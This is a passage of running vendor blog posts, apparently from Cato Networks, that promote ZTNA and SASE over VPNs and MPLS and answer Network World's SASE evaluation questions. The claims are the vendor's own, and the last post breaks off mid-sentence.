“We’ve Already Invested in Our VPN Infrastructure”
VPNs have been around for a while, so many organizations have existing VPN deployments. When the pandemic drove a move to remote work, the need to deploy remote work solutions as quickly as possible led many organizations to expand their existing VPN infrastructure rather than investigate alternatives. As a result, many organizations have invested in a solution that, to a certain degree, meets their remote work needs. These sunk costs can make ripping out and upgrading VPN infrastructure an unattractive proposition.
However, the differential in functionality between a VPN and a ZTNA solution can far outweigh these costs. ZTNA provides integrated access management, which can reduce the cost of a data breach and simplify an organization’s regulatory compliance strategy. A ZTNA solution that successfully prevents a data breach by blocking unauthorized access to sensitive data may have just paid for itself.
“Our Security Team is Already Overwhelmed with Our Existing Solutions”
Many organizations’ security teams are struggling to keep up. The cybersecurity skills gap means that companies are having trouble finding and retaining the skilled personnel that they need, and a sprawling array of security solutions creates overwhelming volumes of alerts and the need to configure, monitor, and manage various standalone solutions. As a result, the thought of deploying, configuring, and learning to use yet another solution may seem less than appealing.
Yet one of the main advantages of ZTNA is that it simplifies security monitoring and management, especially when deployed as part of a SASE solution. By integrating multiple security functions into a single network-level solution, SASE eliminates redundant solutions and enables security monitoring and management to be performed from a single console. By reducing the number of dashboards and alerts that analysts need to handle, SASE reduces the burden on security teams, enabling them to better keep up with an accelerating threat landscape and expanding corporate IT infrastructure.
ZTNA is the Future of Remote Access
Many organizations have solutions that - on paper - provide the features and functionality that they need to support a remote workforce and provide secure access to corporate applications. However, legacy solutions like VPNs lack critical access controls and security features that leave an organization vulnerable to attack.
As the zero trust security model continues to gain momentum and is incorporated into regulations, organizations will need solutions that meet their security needs and regulatory requirements. ZTNA meets these needs, especially as part of a SASE solution.
Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list...
How to Buy SASE: Cato Answers Network World’s 18 Essential Questions Last December, Network World published a thoughtful guide outlining the questions IT organizations should be asking when evaluating SASE platforms. It was an essential list that should be included in any SASE evaluation.
Too often, SASE is a marketing term applied to legacy point solutions, which is why we suspect these questions are even needed. By contrast, The Cato SASE Cloud is the world's first cloud-native SASE platform, converging SD-WAN and network security in the cloud. Cato Cloud connects all enterprise network resources including branch locations, the mobile workforce, and physical and cloud data centers, into a global and secure, cloud-native network service. With all WAN and Internet traffic consolidated in the cloud, Cato applies a suite of security services to protect all traffic at all times. In short, Cato provides all of the core SASE capabilities identified by NWW.
We are pleased to respond point-by-point to every issue raised. You should also check out our SASE RFP template to help with the valuation.
1. Does the vendor offer all of the capabilities that are included in the definition of SASE? If not, where are the gaps? If the vendor does claim to offer all of the features, what are the strengths and weaknesses? How does the maturity of the vendor offerings mesh or clash with your own strengths, weaknesses, and priorities? In other words, if your biggest need is Zero Trust, and the vendor's strength is SD-WAN, then the fit might not be right.
Yes, Cato provides all of the core capabilities NWW defines for SASE – and more. On the networking side, the Cato Global Private backbone connects 70+ PoPs worldwide. Locations automatically connect to the nearest PoP with our edge SD-WAN device, the Cato Socket. Cloud datacenters are connected via an agentless configuration, and cloud applications are connected through our cloud-optimized routing. Remote users connect in by using the Cato Mobile Client or clientless browser access.On the security side, Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, directly built into the Cato Global Private Backbone. Current security services include firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB), and a Managed Threat Detection and Response (MDR) service.
2. How well integrated are the multiple components that make up the SASE? Is the integration seamless?
The Cato SASE Cloud is completely converged. The Cato SPACE architecture is a single software stack running in our PoPs. Enterprises manage and monitor networking, security, and access through a single application. All capabilities are available in context via a shared user interface. Objects created in one domain (such as security) are available in other domains (such as networking or remote access). (To see what we mean by seamless, check out this detailed walkthrough of the Cato Management Application.)
[boxlink link="https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider"] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
3. Assuming the vendor is still building out its SASE, what does the vendor roadmap look like? What is the vendor's approach in terms of building capabilities internally or through acquisition? What is the vendor's track record integrating past acquisitions? If building internally, what is the vendor's track record of hitting its product release deadlines?
Cato has demonstrated its ability to develop and bring capabilities to market. Since its founding in 2015, Cato has successfully developed and delivered the global SASE cloud, which is used today by more than 1000 enterprises. We regularly add new services and capabilities to our platform, such as December's announcement of more than 103 frontend improvements and updates to our backend event architecture. (Other additions included a Cloud Application catalog, a Threats dashboard, an Application Analytics dashboard, CASB launch, and updates to our managed detection and response (MDR) service that automated security assessments.)
4. Whose cloud is it anyway? Does the vendor have its own global cloud, or are they partnering with someone? If so, how does that relationship work in terms of accountability, management, SLAs, troubleshooting?
Cato owns and maintains the Cato SASE Cloud. The PoPs are on our hardware hosted in tier-3 datacenters, running Cato's cloud-native software stack. Every PoP is connected by at least two and many by four tier-1 carriers, who provide SLA-backed capacity. Cato's custom routing software constantly evaluates these paths identifying the shortest path for each packet.
Question for MSPs
Network World also included a series of questions specific to managed service providers (MSPs) that we'd like to address as well. Cato in addition to building a SASE platform is also a service provider so we took the liberty of responding to these questions as well.
1. How many PoPs do they have and where are they located? Does the vendor cloud footprint align with the location of your branch offices?
The Cato Global Private backbone currently serves 140 countries worldwide from more than 70 PoPs that we continue to expand each quarter.
2. Does the vendor have the scale, bandwidth, and technical know-how to deliver line-rate traffic inspection?
Thanks to our highly scalable cloud-native architectures, the Cato Cloud delivers line-rate performance regardless of whether traffic is encrypted or unencrypted or the number of security operations performed. PoPs have enough spare capacity to accommodate traffic surges. Case in point was how our Manchester PoP accommodated additional traffic during the Interxion outage.
3. For the cloud-native vendors: How can you demonstrate that your homegrown SASE tools stack up against, say, the firewall functionality from a name-brand firewall vendor?
Cato can fully replace branch office firewalls and, usually, datacenter firewalls. Moreover, the convergence of capabilities allows us to deliver security capabilities and visibility impossible with legacy point solutions. For example, we can use data science and machine learning algorithms on networking data to spot security threats before they can exfiltrate data. The company was founded by security luminary Shlomo Kramer, co-founder of Checkpoint Software. It taps some of the brightest minds in cybersecurity that Israel has to offer. You're welcome to try out our platform and see for yourself.
4. Is there a risk that the vendor might be an acquisition target? As the market continues to heat up, further acquisitions seem likely, with the bigger players possibly gobbling up the cloud-native newcomers.
Cato is a well-established company with well over 1,100 enterprise customers committed to serving the needs of those customers for the long term. We've raised over $500 million in venture capital resulting in a private $2.5 billion valuation.
5. For the traditional managed services powerhouses like AT&T and Verizon, do they have all the SASE capabilities, where did they get them, and how well are they integrated? What is the process for troubleshooting, SLAs, and support? Is there a single management dashboard?
Cato just like any cloud service provider enables organizations to co-manage their own Cato implementation while Cato maintains the underlying infrastructure. IT teams can opt to manage infrastructure themselves, outsource a subset of responsibilities to a Cato partner, or have a Cato partner fully manage the infrastructure. There's always 24x7 support available.
6. Is there flexibility in terms of policy enforcement? In other words, can a consistent SASE security policy be applied across the entire global enterprise, and can that policy also be enforced locally depending on business policy and compliance requirements?
Yes, customers apply a consistent security policy across the enterprise. In fact, enterprises have full control over their security policies. We instantiate the most commonly used security policies at startup, so most customers require little or no changes. The policy set is instantly applied across the global enterprise or to a specific site or user depending on requirements. Enterprises can, of course, add/change policies as necessary.
7. Even if enforcement nodes are localized, is there a SASE management control plane that enables centralized administration? This administrative interface should allow security and network policy to be managed from a single console and applied regardless of the location of the user, the application, or the data.
Cato provides centralized administration via our management application. Both security and network policies are managed from the same interface for all Cato-connected users and resources, whether they exist in the office, on the road, at home, or in the cloud.
8. How is sensitive data handled? What are the capabilities in terms of visibility, control and extra protection?
Cato encrypts and protects all data in transit and at rest within the Cato network. Designated applications or data flows that contain sensitive information can also remain encrypted if required in a way that bypasses Cato inspection engines.
9. Is policy enforced consistently across all types of remote access to enterprise resources, whether those resources live in the public internet, in a SaaS application, or in an enterprise app that lives on-premises or in an IaaS setting?
Part of what makes Cato unique is that all inspection engines and network capabilities operate on both northbound traffic to the Internet or east-west traffic to other Cato-connected resources. Our CASB, for example, inspects all Internet and cloud-based traffic. Security capabilities continue to perform well on East-West traffic regardless of the user's location due to the Cato global private backbone and our distributed cloud architecture.
10. Is policy enforced consistently for all possible access scenarios--individual end users accessing resources from a home office or a remote location, groups of users at a branch office, as well as edge devices, both managed and unmanaged?
Cato uses a single policy set for all access scenarios.
11. Is the network able to conduct single-pass inspection of encrypted traffic at line rate? Since the promise of SASE is that it combines multiple security and policy enforcement processes, including special treatment of sensitive data, all of that traffic inspection has to be conducted at line speed in a single pass in order to provide the user experience that customers demand.
Cato uses a single-pass inspection engine that can operate at line rate even on encrypted traffic. Thousands of Cato SPACEs enable the Cato SASE Cloud to deliver the full set of networking and security capabilities to any user or application, anywhere in the world at cloud scale using a service that is both self-healing and self-maintaining.
12. Is the SASE service scalable, elastic, resilient, and available across multiple PoPs? Be sure to pin the service provider down on contractually enforced SLAs.
The Cato SASE Cloud is a fully distributed, self-healing service, that includes many tiers of redundancies. If the core processing a flow fails, the flow will be handled by one of the other cores in the compute node. Should a compute node fail, other compute nodes in the Cato PoP assume the operation. Should the PoP become inaccessible, Cato has 70+ other PoPs available that enable users to automatically reconnect to the next best available PoP. Enterprises do not need to do any high availability (HA) planning that is typically required when relying on virtual appliances to deliver SASE services.
We have 99.999% uptime SLAs with our carriers. Should one of the tier-1 carriers connecting our PoPs experience an outage or slowdown, Cato's routing software detects the change and automatically selects the next best path from one of two other carriers connecting our PoPs. Should the entire Cato backbone -- that's right all 70+ PoPs somehow disappear, one day -- Cato Sockets will automatically bring up a peer-to-peer network.
13. One of the key concepts of zero trust is that end-user behavior should be monitored throughout the session and actions taken to limit or deny access if the end user engages in behavior that violates policy. Can the SASE enforce those types of actions in real time?
Cato inspects device posture first upon connecting to the network, ensuring the device meets predefined policy requirements and then continues to monitor the device once connected.
Should a key variable change, such as an anti-malware engine expire, the device can be blocked from the network or provided limited access depending on corporate requirements. As users connect to cloud application resources, Cato inspects traffic flows. Dozens of actions within applications can be blocked, enabled, or otherwise monitored and reported, such as uploading files or giving write access to key applications.
14. Will the SASE deliver a transparent and simplified end user experience that is the same regardless of location, device, OS, browser, etc.?
The Cato experience remains consistent regardless of operating system. Mobile users can be given clientless access or client-based access with the Cato Mobile Client. The Cato Mobile Client is available for all major enterprise platforms including Windows, macOS, Android (also supported for ChromeOS), iOS, and Linux. Users within the locations connected by Cato Sockets, Cato's edge SD-WAN device, log into their network as usual with no change.
Once connected to the Cato SASE Cloud, all security inspection is done locally at the connected PoP, eliminating the traffic backhaul that so often degrades the performance of mobile users situated far from their offices. The Cato Global Private Backbone uses optimized routing to minimize latency and WAN optimization to maximize throughput. The result is a remote user experience that's as close as possible to being inside the office.
Other Questions to Explore
We applaud Network World for raising these issues. Some other questions we might encourage IT teams to ask MSPs include:
High Availability (HA): Take a close look at how HA is delivered by the vendor. What's the additional cost involved with deploying the secondary appliance? How are the SD-WAN devices configured and deployed? With most enteprises, HA has become the defacto edge configuration to ensure the high uptime they're looking for particularly when replacing MPLS.
What happens when there is a lockup rather than just an outage, will the system failover properly?
What about the underlying memory, storage, and server system underpinning what are often virtual appliances?
What happens if the PoP itself becomes inaccessible?
The list goes on. The secure Cato SASE platform is based on a fully distributed self-healing network built for the cloud era that we manage 24/7 on behalf of our customers. Anything less than that from our perspective simply isn't SASE.
The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and...
Why Moving to ZTNA Provides Benefits for Both MSPs and Their Customers The pandemic underscored the importance of secure remote access for organizations. Even beyond the events of these past years, remote work has been normalized and has become an incentive and negotiating point for many prospective hires.
However, many organizations are still reliant on legacy remote access solutions, such as virtual private networks (VPNs), that are not designed for the modern, distributed enterprise. Upgrading to zero trust network access (ZTNA) provides numerous benefits to these organizations.
Main Benefits of ZTNA for MSPs
For Managed Service Providers (MSPs) offering remote access services, making the move to ZTNA can significantly help their customers. However, it is not just the customer who benefits. An MSP that makes ZTNA part of its service offering can reap significant benefits, especially if it is deployed as part of a Secure Access Service Edge (SASE) offering. Let’s take a closer look at some of the key benefits:
Tighter Security Controls
VPNs are designed solely to provide a secure network link between two points. VPNs have no built-in traffic inspection capabilities and provide users with unrestricted access to corporate resources.
By using VPNs for secure remote access, organizations expose themselves to various cyber threats. Cyber threat actors commonly target VPNs with credential stuffing attacks, hoping to take advantage of compromised credentials to gain full access to the enterprise network. VPNs are also prone to vulnerabilities that attackers can exploit to bypass access controls or eavesdrop on network traffic.
ZTNA provides the same remote access capabilities as VPNs but does so on a case-by-case basis that allows effective implementation of least privilege access controls. By deploying ZTNA to customer environments, MSPs can reduce the occurrence and impact of security incidents. This results in an improved customer experience and reduced costs of recovery.
[boxlink link="https://www.catonetworks.com/resources/poor-vpn-scalability-hurts-productivity-and-security/?utm_source=blog&utm_medium=top_cta&utm_campaign=poor_vpn_scalability"] Poor VPN Scalability Hurts Productivity and Security | EBOOK [/boxlink]
Improved Visibility and Control
VPNs provide unrestricted access to the corporate network, providing a user experience similar to working from the office. Since VPNs don’t care about the eventual destination of network traffic, they don’t collect this information. This provides an organization or their MSP with limited visibility into how a VPN is being used.
ZTNA provides access to corporate resources on a case-by-case basis. These access decisions are made based on the account requesting the access, the resource requested, and the level of access requested. Based on this data and an organization’s access controls, access is permitted or denied.
ZTNA performs more in-depth traffic inspection and access management as part of its job, and these audit logs can provide invaluable visibility to an MSP. With the ability to see which accounts are remotely accessing various resources, an MSP can more easily investigate potential security incidents, identify configuration errors and other issues, and strategically allocate resources based on actual usage of IT infrastructure and assets.
Improved Customer Satisfaction
During the pandemic, the performance and scalability limitations were laid bare for all to see. Many organizations needed to rapidly shift from mostly on-site to remote work within a matter of weeks. To do so, they often deployed or expanded VPN infrastructure to support a workforce much larger than existing solutions were designed to handle.
However, VPNs scale poorly and can create significant performance issues. Remote access deployments built on VPNs overwhelmed existing network infrastructure, created significant latency, and offered poor support for the mobile devices that remote workers are increasingly using to do their jobs. During the pandemic, employees experienced significant network latency as traffic to cloud-based applications and data storage was backhauled through on-prem data centers by VPN appliances. As a result, employees commonly sought workarounds - such as downloading sensitive data to devices for easier access or using unapproved services - in order to do their jobs.
ZTNA solutions provide optimized performance and better security by moving away from the perimeter-focused security model of VPNs. As corporate infrastructure and resources move to the cloud, employees need high-performance access to SaaS solutions, and routing traffic to these solutions via the corporate network makes no sense. ZTNA makes it possible to perform access management in the cloud and improve the user experience.
For MSPs, improving the end user experience also improves the experience of their customers, who need to listen to employees’ complaints about performance and latency issues. Additionally, ZTNA enables an MSP to eliminate inefficient routing, which creates unnecessary load on their infrastructure and can make it more difficult to meet customer expectations for network performance.
VPNs provide bare-bones network connectivity for remote users. If an organization wants additional access control or to secure the traffic flowing over the VPN connection, this requires additional standalone solutions.
By making the move from VPNs to ZTNA for secure remote access, an MSP can expand the services offered to their customers with minimal additional overhead. ZTNA offers access management, and so can an MSP. The data generated by ZTNA can be processed and displayed on dashboards for customers looking for additional insight into their network usage or security. MSPs can provide ongoing support services for the management and maintenance of ZTNA solutions.
SASE Supercharges ZTNA
Making the move to ZTNA for their secure remote access offerings makes logical sense for MSPs. ZTNA provides more functionality, better performance and security, and simpler management and maintenance than VPN-based infrastructure.
However, the benefits of ZTNA can be dramatically expanded by deploying it as part of a SASE solution. SASE is deployed as a network of cloud-based points of presence (PoPs) with dedicated, high-performance network links between them. Each SASE PoP integrates ZTNA with other security and network optimization features, providing high-performance and reliable connectivity and enterprise-grade security for the corporate WAN.
Making the move to ZTNA streamlines and optimizes an MSP’s remote access services offering. Deploying it with SASE does the same for an MSP’s entire network and security services portfolio.
Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs...
IT Managers: Read This Before Leaving Your MPLS Provider Maybe you’re an IT manager or a network engineer. It’s about a year before your MPLS contract expires, and you’ve been told to cut costs by your CFO.
“That MPLS – too expensive. Find an alternative.”
This couldn’t have come at a better time...
Employees have been blowing up the helpdesk, complaining about slow internet, laggy Zoom calls and demos that disconnect with prospects. Naturally, it’s your job to find a solution...
There actually could be several reasons why it’s time to pull the plug on your MPLS, or at least, consider MPLS alternatives.
1. Get crystal clear on your WAN challenges:
Do any of these challenges sound familiar?
A. You’ve been told to cut costs
It’s no secret that MPLS circuits cost a fortune – often 3-4x the price of MPLS alternatives (like SD-WAN,) for only a fraction of the bandwidth. But the bottom line isn’t the only factor to take into consideration. Lengthy lead-times for site installations (weeks to months,) upgrades, and never-ending rounds of support tickets must all factor into the TCO of your MPLS. In short, MPLS is no longer competitively priced for today’s enterprise that needs to move at the speed of business.
B. Employees constantly complain about performance
While traditional hub-and-spoke networking topology comes with its advantages, when users backhaul to the data center they clog the network with bandwidth-heavy applications like VOIP and file transfer. Multiplied by hundreds or thousands of simultaneous users and you choke your network, creating performance problems which IT is tasked to solve. Wouldn’t it be nice if IT was free to solve business-critical issues instead of recurring network performance issues?
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=wont_tell_you_about_mpls"] What Others Won’t Tell You About MPLS | EBOOK [/boxlink]
C. You’re “going cloud” and migrating from on-prem to cloud DCs and apps
Migrating from on-prem legacy applications to cloud isn’t generally an “if” but a “when” statement. And the traditional hub-and-spoke networking architecture creates too much latency on cloud applications when the goal is ultimately improved network performance. Additionally, optimizing and securing branch-to-cloud and user-to-cloud access can’t be done efficiently with physical infrastructure, instead of requiring advanced cloud-delivered cybersecurity solutions like SWG, FWaaS and CASB.
D. IT now needs to support work from anywhere, with no downtime
Prior to COVID, work from anywhere was more the exception, rather than a rule. In the “new normal,” enterprises need to the infrastructure to support work from the branch, home, and everywhere else. Traditional remote-access VPNs weren’t designed to support hundreds, or thousands of users simultaneously connecting to the network, while supporting an optimum security posture, like ZTNA can.
So, should you stay with MPLS or should you go?
Ultimately, it’s time to decide whether to stick with your incumbent MPLS provider or consider the alternatives to MPLS...
Whether it’s cost, digitization, performance or secure remote access - is your MPLS “good enough” to support today’s hassles and headaches (not to mention tomorrows?)
2. You’ve decided to look for MPLS alternatives: Do all roads lead to SD-WAN?
You’ve decided that your MPLS isn’t all it's cracked up to be. Now what?
While an SD-WAN solution seems like the natural choice, SD-WAN only addresses some of the challenges that you’ll inevitably face at a growing enterprise.
True, SD-WAN will lower the bill and optimize spend by leveraging internet circuits’ massive capacity and availability everywhere.
However, SD-WAN was designed to optimize performance for site-to-site connectivity, with architecture that isn’t designed to support remote users and clouds.
Additionally, SD-WAN's security is basic at best, lacking the advanced control and prevention capabilities that enterprises need to secure all clouds, datacenters, branches, users and, appliances.
Not to mention, adding SD-WAN to existing appliance sprawl is only going to further complicate your network management, adding more products to administrate, and more hassle surrounding appliance sizing, scaling, distribution, patching and upkeep.
And who needs that headache?
So, how do you solve all the above four challenges, while upgrading your networks and achieving an optimal security posture that allows your enterprise to grow, scale, adjust and stay prepared for “whatever’s next”?
3. Ever Heard of SASE?
No, SASE isn’t just a buzzword or industry hype. It’s the next era of networking and security architecture which doesn’t focus on adding more features to the complicated pile of point solutions, but targets “operational simplicity, automation, reliability and flexible business models,” (Gartner, Strategic roadmap for networking, 2019.)
According to Gartner, for a solution to be SASE, it must “converge a number of disparate network and network security services including SD-WAN, secure web gateway, CASB, SDP, DNS protection and FWaaS,” (Gartner, Hype Cycle for Enterprise Networking 2019.) Gartner is extremely clear that these requirements aren’t just “nice-to-have,” but non-negotiables; the solution must be converged, cloud-native, global, support all edges, and offer unified management.
SASE actually combines SD-WAN and security-as-a-service, managed via a single cloud service, which is globally distributed, automatically scaled, and always updated.
So, instead of opting for more network complexity with SD-WAN, plus all the setup, management, sizing, and scaling challenges that come with it – why not consider SASE?
It’s time to think strategically: Move beyond the limitations of SD-WAN
No matter if you need to solve one, two, three or all four of the above WAN challenges, SD-WAN is a short-sighted point solution to any long-term organizational challenge.
This means that only a SASE solution with an integrated SD-WAN which includes a global-private backbone (over costly long-haul MPLS,) ZTNA (to serve remote access users and replace legacy VPN) and secure cloud access (which allows you to migrate to the cloud,) allows you to successfully grow the business while maintaining your sanity.
If you’re inter